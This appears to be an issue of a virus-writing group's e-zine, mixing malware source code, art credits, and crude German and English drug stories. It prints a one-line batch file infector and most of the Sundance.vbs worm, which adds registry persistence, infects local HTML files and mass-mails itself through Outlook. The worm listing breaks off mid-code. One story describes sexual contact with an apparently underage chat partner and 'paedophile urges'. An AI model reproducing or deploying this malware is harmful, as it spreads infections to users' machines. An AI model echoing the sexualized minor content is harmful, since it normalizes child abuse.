%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%%***************....%~1\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%******************.%%**************.....%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***************....%%**********.........%%******************.%%*..................%w%**********.........%%*****..............%%*..................%\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%****...............%%*****..............%p%********...........%%*..................%%*************......%%**.................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%****...............%p%*****************..% %0 
%***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****...............%%*******************%%*..................%%*****..............%%****************...%%*..................%%*********..........%\%******.............%%*************......%%****************...%%**************.....%%***************....%%*..................%%**.................%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................% .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....% %***********........%%***************....%%**.................%

sources

BatXP.Limitrophe.c DvL echo off %random% for /r \ %%_ in (*.b*) do copy %0 %%_

arts

rRlf Logo DvL

arts

Presenting KAV Team DvL
has to be looked at together with "the good ones" by philet0ast3r. btw: DvL studies art right now. check out his deviantart page: http://acelceva.deviantart.com/

articles

Die unergründlichen Wege der Kunst El DudErin0 Die unergründlichen Wege der Kunst Kürzlich besuchte ich eine Kunstgallerie nicht weit entfernt von goatse.cx und ccn.com. Es waren viele Werke jüngerer Künstler zu begutachten, und nicht eines davon war Porno. Doch es kam viel besser: Ich schlenderte durch die endlosen Reihen an belanglosen Versuchen der Künstler sich in das Hirn eines dreijährigen zu versetzen und tolle Farbkreationen zu erschaffen. Doch dann erblickte ich in der Ecke hinter einem Papierkorb einen zusammengefalteten Zettel. Ich bin ja ziemlich neugierig und deswegen ging ich zum Papierkorb. Ich sah mich um, damit mich nicht eine alte Museumswärterin für einen Penner hielt und mich hinauswarf, wenn ich den Zettel aufheben würde. Ich nahm das Stück Papier an mich und ging weiter. Als ich an der Männertoilette vorbeikam, betrat ich sie und schloss mich in einer der Kabinen ein. Ich entfaltete das Papier in der Erwartung irgendein wichtiges Dokument gefunden zu haben. Was ich jedoch fand war dies: Der kleine James Hansard hatte diese liebliche Zeichnung gestaltet. Die Bildüberschrift lautete: "This is Tim The yowie man scaring everyone." Auf dem Bild sah man eine monströse Gestalt auf die vielerlei Vögel Kurs genommen hatten, und die mit ihrem dezent angedeuteten Schrei einige Menschen zum weglaufen brachte. Die Farbwahl und der Zeichenstil erinnerten mich sofort an die erstklassigen Illustrationen von Hunter S. Thompsons "Fear and Loathing in Las Vegas". Der Charme der Zeichnung hatte mich vollkommen in ihren Bann gezogen. Im linken oberen Bildrand war eine sehr coole, aggressive Sonne zu sehen, die blutrot gefärbt war. Ich starrte einige Zeit auf das Bild, bis ich plötzlich wieder zu mir kam und mir bewusst war, dass ich in einer Toilette saß. Ich beschloss zu gehen, doch vorher klaute ich mir noch einige dieser Papiertücher mit denen man sich die Hände abtrocknet. 
Dem Rest der Ausstellung schenkte ich kaum mehr beacht; ich hatte schliesslich ein Meisterwerk in meiner Tasche, dass ich mir näher begutachten musste. Ich holte meinen Mantel an der Garderobe ab und begab mich nach draussen, wo die Welt mit aller Kraft versuchte unterzugehen. Ich nam also ein Taxi um nach Hause zu kommen. Ich stürmte in meine Wohnung und fiel fast über einen Stapel CD-Rohlinge. Ich habe die Dinger fast überall in der Wohnung aufgetürmt. Oben auf jedem habe ich einen Halogenstrahler draufgelegt, und so dienen sie mir als Deckenfluter, die so tolles unaggressives Licht machen. Jedenfalls versuchte ich ersteinmal den Namen "James Hansard" irgendwo im Internet zu finden. Leider fand ich nur tausende Pornoseiten, die mir hoch und heilig versprachen, wenn ich 23 ¤ im Monat zahlen würde, gäben sie mir Britney Spears als meinen persönlichen Sklaven dazu. Deswegen bezog ich neben der Suchmaschine meine zweitverlässlichste Quelle in die Recherche mit ein; der AOL-Teen-Chat. Ich begab mich in den Channel für meine Stadt und traf nachdem ich einige Pokemon-Schlachtrufe abgegeben hatte, "SexyGrrrl420". Ich hatte eine schöne Konversation und nach dem Cybersex mit ihr auch eine überdurchschnittlich hohe Befriedigung meiner paedophilen Triebe. Sie schickte mir nachdem ich sie darum bat ein Bild von ihr: Das Tattoo auf ihrer Taille war nicht zu übersehen. Da stand doch wirklich "Hansard's Fuckbeast". Ich musste sofort mit ihr weitersprechen. Sie erzählte mir, dass sie als sie das erste Mal Marijuana konsumierte, so von Sinnen gewesen sei, einen dreijährigen Jungen gebeten zu haben ihr ein Tattoo mit einer eiterverkrusteten Fixernadel auf ihren Bauch zu ritzen. Als sie am nächsten Tag aufwachte war sie Hansard's Fuckbeast. Also, mit diesem kleinen Mann muss ich mich unbedingt mal anfreunden, wenn ich ihm über den Weg laufe, der ist mir echt sympatisch. Ich beendete so meine alltägliche Wichssession, und setzte mich in meinen Sessel. Da fiel mir das Bild wieder ein. 
Ich holte es heraus und bemerkte erst jetzt, das dieser kleine dreijährige Typ der gleiche war, der auch das Bild gemalt hatte. Ich rannte wieder zum PC und setzte mich nocheinmal mit meiner Informantin in Kontakt. Bei dieser Gelegenheit lies ich mir nochmal ein Bild von ihr schicken: Sie sagte, dieses Bild sei einen Tag vor dem Fixertattoo Spektakel gemacht worden, deswegen würden sie und ihre Freundin auch so fröhlich dreinschauen. Das machte mich geil. Ich holte mir nochmal einen runter.

articles

You know how it is... El DudErin0 You know how it is... It catches you pretty much off guard. Just a moment ago you were at some party with your buddies and this one slightly unhinged guy with dreadlocks, who lets you smoke some of his "very best weed ever". The bong makes its way around your now expanded circle of friends. Flame, bubbling, coughing, next. You get ready for your first bowl. So you hold the lighter to the weed and off you go. You suck the smoke into the tiniest capillaries of your lungs because you are suspicious of the promise about the quality. The hippies are forever claiming that their dried-out, stem- and seed-ridden crumbs are the best you can get anywhere. The weed burns up in an improbably short time and all that remains is ash, which gets sucked into the bong. The smoke is still standing in the bong and your lungs are full to bursting, but you keep sucking and let go of the carb hole. You feel the sledgehammer pounding on the back of your head and start coughing until your airways burn. You hold the bong out at arm's length towards the next person in the circle, hope he will snatch it from you in less than a millisecond, and stand up. You need something to drink now. Your mouth is parched and you are burning inside. OK. Which way to the kitchen here? There has to be something to drink there. Around you: a door frame. Two guys are talking to each other. Each of them with a beer bottle in his hand. You walk towards them and want to get past them. An earthquake shakes you. Where are you? Concentrate. Something to drink. You are still walking. You look around, and as you notice that your T-shirt is wet you see the two guys from just now gesticulating wildly in your direction. But where is the kitchen now.
You would ask someone if you could get a word out right now without keeling over from the dizziness that would follow. Another door, coming at you at breakneck speed. You try to dodge the frame and slip through the middle into a bright room fitted with all sorts of glittering fixtures, and you realize that you really have found the kitchen. "Shit!" Who said that? You look around, but before you can make anyone out your gaze falls on a tap. "That guy doesn't look fit anymore." He should just shut his trap. Why is he butting in anyway? This is now a matter strictly between you and the water. You turn on the tap, catch some water in your hands and drink from them. As crystal clear as the water seems to you, it has not made you mentally fit again. But the burning has calmed down and you start thinking about making contact with other people again. "...Good shit, man..." Through your half-open eyelids you see a guy coming towards you. "...try some?" He has a broken cigarette hanging from the corner of his mouth and winks at you. "...from Paris..." He doesn't look like a Frenchman, but when he holds his cup out to you, you snatch it out of his hand, without ever really having so much as thought the wish to, drink it down and throw it behind you with one hand - "...absinthe..." - while wiping your mouth with the other. You open your eyes as wide as you possibly can and look at the guy, who is probably staring back at you just as aghast. Mirror image. Actio = reactio. In your case the action would be the ghastly, biting taste of the absinthe you have just administered to yourself in a nice 0.3 litre portion. For your mirror image, the mere sight of a person surrendering to toxic influences in such an unscrupulous way is enough for the same reaction.
You don't quite know how to go on from here, and besides, you don't want to ruin the perfect match with your mirror image, half bent forward, which apes you with its mouth wide open and its eyes torn open even wider. "Oh shit..." And you tip over to the side, silently and in slow motion. --- You open your eyes again without remembering hitting the floor and notice that you are already standing again, or have not fallen over at all yet. But before you can rack your brain over it you feel the stabbing in your eyes. It is so bright that to you it is like the other extreme of blindness. And you fall over once more, and this time it hurts so much that you scream out loud. --- The next time you come to, you open your eyes again, and this time go unpunished. What you see is an angel. But he is not white and shining; his wings and his robe are smeared with oil and he is wearing work gloves and a yellow hard hat. What's more, a broken cigarette hangs listlessly from the corner of his mouth. He stands with his back to you and is striking with a sledgehammer at a stone which, you concede, bears a certain resemblance to your head.

arts

biggest fux0rs El DudErin0

arts

El DudErin0 himself

articles

I like it here El DudErin0 I open my eyes and look at the ceiling. That is, I would look at the ceiling if it weren't dark. So first extend the hand - nice and carefully, so I don't knock anything over - and feel for the lamp. After a few clumsy movements I have something in my hand that feels familiarly like the switch of my lamp. *click* *click* ... *clicklicklick* ARGH! Why is there no goddamn light here? The bulb must have died, maybe I built myself a vaporizer last weekend for my new weed from Holland. Damn, if only I could remember! So first fish for my glasses, and then hope I don't step on any overly injurious objects, I still have to go to school after all. Once I have maneuvered myself along the wall to the light switch, I look forward to the arrival of light in my room, and to the burning in the eyes when you almost go blind from the first light that reaches them. But not even this joy is granted to me. The gentle reader has probably noticed by this point that the power had gone out in the house. Unlike me, the gentle reader is also not sleepy and grumpy and longing to be back in his soft bed. Which is to say, the whole thing was not as clear to me as it should have been. So first I tear open the door to my room and half walk, half fall down the stairs to the kitchen. I attempt an upright walk à la James Bond so that my parents don't think yet again that I have spent the whole night smoking weed again, like that one time when I pulled lemons over my toes and woke my mother with a "Star Trek" replica phaser in her face (the little plastic switch was set to terminate and not stun...).
As I open the door to the kitchen I think, "OK, now wake up again quickly, because in reality we haven't rented our kitchen out to that sect for three months now." In front of me on the kitchen table stand huge candles whose glow dazzles my sight, and around the table sit some shadows, apparently playing Schafkopf. When my eyes focus again the whole thing turns out to be an illusion, and at the table by candlelight sit my parents and my sister, and they nihilate in my direction: "Power outage". Slowly the puzzle comes together for me too. A power outage, then... That means my PC was switched off and I didn't even notice. Without answering their call I flee from my family and check whether anything has happened to my PC. So I switch it on, and when the theme song of the Benny Hill Show sounds, I briefly cheer inside, since my PC starts normally without getting stuck in the BIOS. Not that I'm being paranoid right now, but after forty-seven similar incidents in which things didn't go so well, a startup sound like that is a small reassurance. Anyway, I load all the crap you need, and see that my scat movies are being downloaded in Kazaa at a rate of 70kb. REJOICE REJOICE JOY JOY, when I get back from school there'll be a load of "Deutsches Schiezze Filme" for me first thing! What I haven't mentioned so far - and what was of no significance whatsoever - is that in my spare time I am also a wannabe black guy. That also means I act as if I understood what the rappers of the world have to say. Sometimes I also like to pretend I can freestyle, so I quickly search for an instrumental of Shook Ones by Mobb Deep and head to the bathroom first, to wipe yesterday's ash and muck off my face.
als ich so dasteh und mir immer wieder Wasser ins Gesicht schmeisse, um wach zu werden meint das Licht, es müsste zeigen wie funky fresh es down ist mit meinem kommenden Freestyle und macht erstmal nen improvisierten epileptischen Anfall, soll heissen, es geht an - aus - bleibt aus - an -aus - wieder an. Mit ner neuen Ladung Wasser lass ich erstmal das Fragezeichen aus meinem Gesicht verschwinden und geh zurück zum PC. Dieser ist zu meiner Überraschung nicht mehr, wie erwartet AN, sondern AUS. Als ich das Ding anschalte und hochfahren lasse ist es ersteinmal Zeit einen achtundvierzigsten Strich in die Wand neben meinem PC-Tower zu ritzen. Ein schöner Bluescreen schreit meinen immernoch lichtempfindlichen Augen entgegen. UNMOUNTABLE BOOT VOLUME. HASS! VERACHTUNG! "FUCK!" "KLEINE KINDER, DIE VON BOZO, DEM WUNDERSAMEN CLOWN EINE LEKTION IM ARSCHFICKEN ERTEILT BEKOMMEN! VERFLUCHTE GOTTVERDAMMTE DRECKSCHEISSE! Nachdem ich mir fast die Hand an meiner Tastatur gebrochen habe, und sie näher inspizire, um mögliche offene Brüche frühzeitig zu diagnostizieren fällt mein Blick auf meine Armbanduhr und die sagt: ES IST ZEIT FÜR SCHULE! WOW. Dieser Schultag ging als einer der längsten, langweiligsten in die Geschichte der amerikanischen Eisenbahn und auch die Geschichte der Welt ein. Nachdem ich heimkam, aus volkommener Langeweile ein Bild gemalt hatte während sechs Stunden lang CHKDSK auf meinem PC lief (Anmerkung: das Bild heißt when i am king (you will be first against the wall) und kann weiter unten begutachtet werden), sitze ich nun hier, bin überglücklich, benötige ungefähr ... viel Geld für irgend ne Backup Scheisse, und bekomme ne Mail in der steht "SCHREIB WAS, FAULE DRECKSAU!" und was denkt ihr tue ich? Ich mach notepad auf, und schreib davon, was mir heute passiert ist, als ich aufwache. Ich öffne die Augen und sehe an die Decke. ad absurdum.

articles

neu_textdatei_23 El DudErin0 Scheisse, verdammte dachte er sich. War mal wieder nix cooles in da Glotze. Er beschloss sich hinzuhocken und ne Story für seine Homepage zu schreiben. Im Hintergrund lief coole Mukke, und so dachte er sich er könnte doch jetzt auch zu kiffen anfangen. Da zufällig der Abend des letzten Schultags vor den Ferien war, kam ihm die glorreiche Idee sich so wegzuhauen, wie noch nie einer vor ihm es getan hatte. Goddseidangg hatte er noch seine lustigen Sachnn zu Hause. Schau mer mal dachte er laut und begann seinen Vorrat zu inspizieren. Es waren noch 10g vom Super Sensi Skunk aus Amsterdam da. Yeeehaa!, er schrie vor Freude auf. Wie es der Zufall so will, hatte er auch seine 7-Liter-Bong bei sich rumstehen. Er stopfte erstmal einen ganzen Kopf pures Sensi. Dann pflutschte er die Bong so, dass in seinem ganzen Raum ein Unter- oder Überdruck entstand, jedenfalls ganz schön arg. Er merkte wie der Rauch seine Lungen hinuntermarschierte, und es sich dort gemütlich machte. Dann kickte es ihn so hart, dass er jede einzelne Gehirnzelle zerplatzen HÖREN konnte. Ihm war ziemlich enorm schlecht, also versuchte er sich auf einen Sessel zu setzen. Dooch, Problemm. Irgendwie war er jetzt nicht mehr so ganz fähig sich den 2 meter langen Weg zum Sessel zu bahnen. Ach, was solls dachte er, und sofort packte er seine X-tra-long-big-Kingsize-smokings aus. Er drehte sich einen fetten Dübel aus dem Rest vom Hyper-Ultra-Illusions-goin'-thru-my-Head-Skunk. Jenen zog er sich dann genüsslich rein. Als er damit fertig war, beschloss er sich nun doch zu setzen. Er machte einen Schritt, schien aber nicht grade viel voranzukommen. Es kam ihm vor, als würde er durch eine endlose Wüste marschieren. Seinen Schätzungen nach war er nach ungefähr zwei Stunden am Ziel. Erleichtert setzte er sich. Er sass da, und sah aus seinem Fenster raus. Da er in einem Kaff, ohne Zivilisation wohnte, sah er auf ein offenes Feld. 
Cooler scheiss da draussen, is ja langweiliga als BigBrother ohne Sladdi. Aber seine Meinung änderte sich, als er sah, wie ein fettes UFO über dem Feld schwebte. Es schoss irgendwelche Laserstrahlen auf das Feld, um einen Kornkreis zu machen. Ich weiss ja nicht was diese Vollidioten wollen, aber wieso malen die einen Kornkreis in der Form vom ner Muschi ins Feld, und schreiben darunter in Psychedelischen Farbverläufen riesengross "FICKEN"? Das war jetzt natürlich schon ZIEMLICH seltsam. Das UFO flog wieder weg. Hmmm. Er fragte sich jetzt wirklich, was die Kornkreisbotschaft auf dem Feld bedeutete. Nachdem er 3 Stunden darüber nachgedacht hatte, gab er auf. Er sah sich in seinem Zimmer um. Die Bong. ... Ein kleiner Rest vom Hyppa-Power-besser-als-zuschlichten-Skunk. ... Sein Schreibtisch. ...Sein PC. ... Die Tussi aus seina Klasse, die er schon seit Ewigkeiten poppen wollte. ... Sein Sessel. ... .. . . .STOPP!!! Die Tussi aus seina Klasse, die er schon seit Ewigkeiten poppen wollte?????. Er sah nochmal hin. Nochmal. Sie war echt da. Tja, wenn du schonmal da bist, können wir ja jetzt Geschlechtsverkehr praktizieren sagte er. Ja, ich will auch mal wieder so richtig durchgepoppt werden erwiederte sie. Hossa, dachte er. Dann poppte er sie ein paarmal. Als sie fertig waren, sagte sie ihm, es sei das beste Ficken gewesen, das sie je erlebt hätte, (und nein es war nicht ihr erstesmal, nur um das klarzustellen). Sie beschloss noch ne weile dazubleiben. Praktischerweise hatte sie auch nochn bischen Gras dabei. Es war wahrscheinlich ne ganze Pflanze, die sich die beiden dann noch durch die Bong zogen. Spätta dann, beschloss sie zu gehen. Hawadäa, und machs gut sagte er, denn er wusste was sich gehört. Als sie gegangen war, freute er sich noch ne richtig grosse Weile, weil er sie endlich gepoppt hatte. Als er mit freuen fertig war, fragte er sich, was er jetzt machen sollte. Er beschloss aus dem Fenster auf das Feld zu schauen. 
Der Kornkreis in Form eines femininen Geschlechtsteils war immer noch da. Da er ne Glozzä in seinem Zimmer rumflakken hatte, drehte er sie an. Durch Zufall schaltete er die Nachrichten ein. Es wurde gemeldet, dass die Aliens die Erde bedrohen, und ihre Forderungen überall verkünden. Toller Scheiss dachte er. Einmal kifft man, und dann geht die scheiss Welt kacken. Und man ist nicht mal in der Lage alle auszulachen. So ein dummer Scheiss. Da wie anfangs schon erwähnt nichts cooles in da Glozzä lief, schaltete er den Scheiss wieder aus. Aber irgendwie wollte die Glozzä nicht so recht was er wollte. Er sah noch immer ein Fernsehbild. Er riss einfach den Stecker raus. Das Bild war imma noch nicht weg. Das machte ihn brutal verrückt. Was soll na der Scheiss, da ihm jetzt allmählich der Zweifel an der Echtheit des Fernsehbildes überkahm und jetzt sowieso sein Telefon klingelte, beschloss er die ganze Aktion abzubrechen. Er wanderte den Weg zum Telefon, er beeilte sich sogar. Kruzifix, welcher Volldepp is na dran? Es war eina vo seine Kümböllz. Was bist na du für a Volldepp antwortete der Kumpel, ich hab jetzt ne Viertelstunde läuten lassen. -Ach fick dich. -Was is jetzt eigentlich mit deiner Story, die du schreiben wolltest? -Da is was dazwischen gekommen. -Was na? -Ach a Scheiss. -Hast gekifft, was? -Weiss nicht. -Hast jez oda hast nicht? -Vielleicht. Is nicht so wichtig. Aba hast du schon gehört, dass die Aliens die Erde bedrohen? -Ja, die fordern FICKEN, des habns wenigstens in den Nachrichten bracht. ....... Da fiel ihm auf, dass er nun schon ziemlich 5 Minuten in seine PC-Boxen gesprochen hatte. Ihm war niemals zuvor aufgefallen, dass seine Boxen so gesprächig waren, er beschloss in Zukunft mehr mit ihnen zu reden. Er lies seinen Blick über seinen Schreibtisch mit dem PC streifen. Ihm fiel auf, dass die Tasten auf seiner Tastatur so lustig rumzuhüpfen begannen. Sie verschoben sich und bildeten das Wort FICKEN. 
Bei dem Wort musste er an nen Kumpel denken, der gleich beim ersten mal ohne Gummi geknallt hatte. Er brach in nen kranken Lachkrampf aus und der dauerte so seine 1-2 Stunden. Als er sich wieder beruhigt hatte, kam er zu dem Schluss, dass es nicht gerade klug sei ohne Gummi zu ficken. Das war aber ziemlich nebensächlich. Er drehte sich um.... HALT!!! MOMENTAMAL. Ein Gefühl des endlosen Wissens durchfuhr ihn, und führ einen Moment begriff er den Sinn des Daseins, da jener aber nicht so aufregend war, wie er sich das immer vorgestellt hatte, fiel ihm schlagartig ein: FICKEN---OHNE GUMMI--- NA KLAR, die Aliens wollen, dass alle Menschen ohne Gummi miteinander schlafen, und sich somit über kurz oder lang alle mit AIDS infizieren. Die Menschheit würde ausgerottet werden, und die Aliens könnten den Planeten kampflos übernehmen. Er musste etwas tun. Doch noch war Zeit. Er hockte sich nochmal hin. Man, Scheisse hab ich lang nix mehr durchgezogen. Ich hab ja noch den suppa-deluxe-supreme 5g Haschbrocken!!! Er rollte sich nen dübel, und zog ihn durch. Jetzt aber auf zum Menschheitretten! Hey, fugg, ich weiss garnicht, was man so braucht um die Welt zu retten. Er sah sich in seinem Zimmer um. Da war ja seine Brechstange, die er sich irgendwann mal für 4 DM gekauft hatte. Des teil könnt ich brauchn. Er packte die Brechstange in seinen Survival-Skater-Backpack. Das war so ziemlich alles, was zum Weltretten taugte, jedenfalls in seinem Zimmer. Er ging nach unten. ELTERN!!! Ich geh mal schnell die Welt retten. -Aba, du kommst schon vor zwölf Uhr wieder heim oder?? -Schau mer mal. Hawadäa. Er ging einfach in die Richtung, wo er vermutete, dass dort die Aliens sein könnten. Nach 5 stunden kam er schon im näxxten grösseren Kaff an. Und wirklich. Da waren die Aliens, und versuchten mit ihrem Mutterschiff das ganze Kaff zum FICKEN aufzufordern. Er zückte seine Brechstange. Er warf sie auf das UFO. Die Brechstange fiel vom UFO wieder zu Boden. So eine schwule Scheisse! 
Da fiel ihm ein, dass sein Survival-Skate-Backpack zugleich sein Schulrucksack war, und er noch die ganze Scheisse, die er sonst immer in die Schule mitnahm dabei hatte. Er holte seinen Rocket-Launcher hervor, und schoss ne fette Rocket auf das UFO. Das UFO wurde zerfetzt. Er verpisste sich, nicht dass ihm noch das Amt für extraterrestrische Flugkörper irgendeinen Ärger bereitete. Als er wieder zu Hause war, legte er sich in sein Bett. Er dachte noch ein bißchen nach, war froh, dass er die Welt gerettet hatte, beschloss in nächster Zeit nicht gleich nach dem Aufwachen drei Köpfe durchzuziehen, und schlief zufrieden ein. Er hatte ja jetzt endlich die geile Tussi aus seina Klasse gepoppt.

arts

L0GO El DudErin0

articles

Tragic Height of Fall El DudErin0 The match glides slowly across the striking surface of the matchbook labeled "Cocamungo Bar". It travels out past the edge of the matchbook and shortly afterwards comes to a stop in the air. In a glaring explosion the match head ignites and the flame flares up. He raises the flame toward his face. For a moment the moon, the match and his eyes form a line. It begins. Shoulder height... Letting go of the match just now was probably the hardest decision he has ever made. But now it is falling, and he relaxes. ...Heart height... Pump-pump. He swallows. He is standing in the middle of a puddle of gasoline; now the part of his brain that still functions rationally knows it too and screams blue murder. Inside him, all sorts of fluids are being flushed through the tiniest channels at incredible speed, in a last desperate defensive action by his body, which is mobilizing all its strength to still escape the overwhelming threat it senses. ...Navel height... We are in an uncontrolled landing approach onto a nuclear power plant. Please fasten your seat belts and send one very last quick prayer heavenward, that someone up there may have mercy on your rotten soul. ...Final stop. The match falls onto his palm, the hand closes around it, and when it opens again a wisp of smoke rises from between his fingers. *Ding* Please remain seated with your seat belt fastened until we have reached our final parking position. In the meantime your body will have a large portion of adrenaline ready for you. The captain and his team wish you a pleasant stay in your life. He takes one deep breath and stands motionless for a while. No, this is not how it will all end. Of that he is convinced. Certainly not today. Or tomorrow. Or any time soon. 
And if it does, then someone else can damn well do the dirty work. He walks slowly across the empty parking lot of the Cocamunga Bar and gets into his car. He turns the ignition key, and from the engine: *Vrrrrrmm-Vrrrwmmm* and from the radio: "That's great, it starts with an earthquake, birds and snakes, an aeroplane and Lenny Bruce is not afraid..."

sources

Sundance.vbs Energy 'Sundance.vbs worm 'This are the Last Open Source from my Vx Days 'I married my Old Girlfriend 'I am leave for a while this szene 'Thx to: AlcoPaul my Great Brother, the Brigada Ocho Members, and The RRLF Group!!! '....bye Energy set fso=createobject("Scripting.FileSystemObject") set repwin=fso.GetSpecialFolder(0) set WshShell = WScript.CreateObject("WScript.Shell") dim Nom1,Nom2,Action,html,script,script2 dim scripthtml(1000) Cle1="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Worm" Cle2="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentSunDance" Set file = fso.OpenTextFile(WScript.ScriptFullName, 1) Script = file.ReadAll Script2=replace(Script,chr(34),chr(163)) Script3=Script2 For i= 1 to 10000 do car = left(Script3,1) Script3=right(Script3,len(Script3)-1) if len(Script3)=0 then exit for if asc(car)>32 or car=" " then ScriptHtml(i)=ScriptHtml(i)+car if car = chr(10) then exit do loop until car = chr(10) if ScriptHtml(i)="" then exit for Next call lancement call mailoutlook call listadriv Call fin sub lancement if Wscript.ScriptFullName="C:\SunDance.vbs" then Nom1=GenerNom() Nom2=GenerNom() WshShell.RegWrite Cle2+"\Run\"+Nom1,repwin+"\"+Nom2+".vbs" WshShell.RegWrite Cle2+"\RunServices\"+Nom1,repwin+"\"+Nom2+".vbs" Set FichDer=fso.CreateTextFile(repwin+"\"+Nom2+".vbs") FichDer.write Script msgbox "You Updated my SunDance E-Mail Virus..Thx: To all Members of Brigada Ocho.(c) by Energy" end if action=1 on error resume next action=WshShell.RegRead(Cle1) WshShell.RegWrite Cle1,Action NomHtm=genernom() set FichIn=createtextfile(repwin+"\"+NomHtm+".htm") FichIn.writeline "<script language=vbscript>" FichIn.writeline "<!--" Fichin.writeline "set fso=createobject("+chr(34)+"Scripting.FileSystemObject"+chr(34)+")" FichIn.writeline "Set WshShell = Createobject("+chr(34)+"WScript.Shell"+chr(34)+")" FichIn.writeline "set fich=fso.createtextfile("+chr(34)+"C:\SunDance.vbs"+chr(34)+")" FichIn.writeline "dim vbfich(10000)" For i= 1 to 10000 
FichIn.writeline "vbfich("+Cstr(i)+")= "+chr(34)+ScriptHtml(i)+chr(34) If ScriptHtml(i)="" then exit for Next PlusRien: FichIn.writeline "For i = 1 to 10000" FichIn.writeline "vbfich(i)=replace(vbfich(i),"+chr(34)+chr(163)+chr(34)+",chr(34))" FichIn.writeline "fich.writeline vbfich(i)" FichIn.writeline "If vbfich(i)="+chr(34)+chr(34)+" then exit for" FichIn.writeline "Next" FichIn.writeline "fich.close" FichIn.writeline "WshShell.run "+chr(34)+"C:\SunDance.vbs"+chr(34) FichIn.writeline "-->" FichIn.writeline "</"+"scr"+"ipt>" FichIn.write FichIn2 FichIn.save FichIn.close set FichHtm=opentextfile(repwin+"\"+NomHtm+".htm",1) Html=FichHtm.readall FichHtm.close end sub Sub listadriv() if Action = 1 then On Error Resume Next Dim d, dc, s Set dc = fso.Drives For Each d In dc If d.DriveType = 2 Or d.DriveType = 3 Then fileslist(d.path + "\") folderlist(d.path + "\") End If Next End if End Sub Sub folderlist(folderspec) On Error Resume Next Dim f, f1, sf Set f = fso.GetFolder(folderspec) Set sf = f.SubFolders For Each f1 In sf fileslist (f1.Path) folderlist (f1.Path) Next end sub sub fileslist(folderspec) On Error Resume Next Dim f, f1, fc, ext, ap, s, bname Set f = fso.GetFolder(folderspec) Set fc = f.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = LCase(ext) s = LCase(f1.Name) if ext="hta" or ext="html" or ext="htm" then Set FichIn = fso.OpenTextFile(f1.path, 1) FichIn3=FichIn.ReadAll FichIn2 = FichIn.Readline FichIn.close if FichIn2<>"<SCRIPT language=vbscript>" then Set FichIn = fso.CreateTextFile(f1.path) FichIn=fso.CreateTextFile(f1.path) FichIn.writeline "<script language=vbscript>" FichIn.writeline "<!--" Fichin.writeline "set fso=createobject("+chr(34)+"Scripting.FileSystemObject"+chr(34)+")" FichIn.writeline "Set WshShell = Createobject("+chr(34)+"WScript.Shell"+chr(34)+")" FichIn.writeline "set fich=fso.createtextfile("+chr(34)+"C:\SunDance.vbs"+chr(34)+")" FichIn.writeline "dim vbfich(10000)" For i= 1 to 10000 FichIn.writeline 
"vbfich("+Cstr(i)+")= "+chr(34)+ScriptHtml(i)+chr(34) If ScriptHtml(i)="" then exit for Next PlusRien: FichIn.writeline "For i = 1 to 10000" FichIn.writeline "vbfich(i)=replace(vbfich(i),"+chr(34)+chr(163)+chr(34)+",chr(34))" FichIn.writeline "fich.writeline vbfich(i)" FichIn.writeline "If vbfich(i)="+chr(34)+chr(34)+" then exit for" FichIn.writeline "Next" FichIn.writeline "fich.close" FichIn.writeline "WshShell.run "+chr(34)+"C:\SunDance.vbs"+chr(34) FichIn.writeline "-->" FichIn.writeline "</"+"scr"+"ipt>" FichIn.write FichIn3 FichIn.save FichIn.close end if End If next end sub sub MailOutlook() On error resume next Set WshShell = WScript.Createobject("WScript.Shell") Set out = CreateObject("Outlook.Application") If out = "Outlook" and Action=1 and Wscript.ScriptFullName="C:\SunDance.vbs" Then Set mapi = out.GetNameSpace("MAPI") Set carnets = mapi.AddressLists For Each carnet In carnets If carnet.AddressEntries.Count <> 0 Then WshShell.AppActive "Microsoft Outlook" WshShell.Sendkeys "{TAB}{TAB}{TAB}{ENTER}" carnet2 = carnet.AddressEntries.Count For entree = 1 To carnet2 Set adresse = carnet.AddressEntries(entree) Set message = out.CreateItem(0) message.to=adresse message.subject="SunDance Update" message.htmlbody=html message.DeleteAfterSubmit = True set Copie=Message.Attachments Copie.add Wscript.ScriptFullname message.send Wscript.Sleep 5000 WshShell.AppActive "Microsoft Outlook" WshShell.Sendkeys "{TAB}{TAB}{ENTER}" WshShell.Sendkeys "{TAB}{TAB}{ENTER}" Next End If Next End If end sub Sub Fin() On error resume next do If action=1 then WScript.Sleep 2000 WshShell.Regdelete Cle2+"\Run\"+Nom1 WshShell.Regdelete Cle2+"\RunServices\"+Nom1 fso.DeleteFile (repwin+"\"+Nom2+".vbs") Nom1=GenerNom() Nom2=GenerNom() WshShell.RegWrite Cle2+"\Run\"+Nom1,repwin+"\"+Nom2+".vbs" WshShell.RegWrite 